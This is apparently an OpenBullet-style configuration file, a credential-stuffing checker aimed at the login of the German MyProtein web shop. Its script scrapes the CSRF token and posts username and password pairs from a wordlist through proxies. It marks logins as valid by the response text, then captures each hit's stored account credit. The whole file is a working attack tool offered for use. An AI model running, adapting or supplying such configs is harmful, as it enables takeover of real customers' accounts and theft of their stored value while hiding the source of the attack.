[SETTINGS]
{
  "Name": "MyProtein.de",
  "SuggestedBots": 1,
  "LastModified": "2019-04-05T20:13:50.2223761+02:00",
  "AdditionalInfo": "",
  "Author": "Acemy#7578",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_INFO REQUEST GET "https://de.myprotein.com/elysiumAuthentication.login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "csrf_token\" value=\"" "\"/>" -> VAR "TOKEN" 
REQUEST POST "https://de.myprotein.com/elysiumAuthentication.login" 
  CONTENT "elysium_username=<USER>&elysium_password=<PASS>&returnTo=&csrf_token=<TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Host: de.myprotein.com" 
  HEADER "Origin: https://de.myprotein.com" 
  HEADER "Referer: https://de.myprotein.com/login.jsp" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "'visitorExistingCustomer': 'true'" 
  KEYCHAIN Failure OR 
    KEY "Angaben sind falsch" 
REQUEST GET "https://de.myprotein.com/accountHome.account" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "<p class=\"referralsCard_stat\">" " &#8364;</p>" -> CAP "CREDIT" "" "€" 
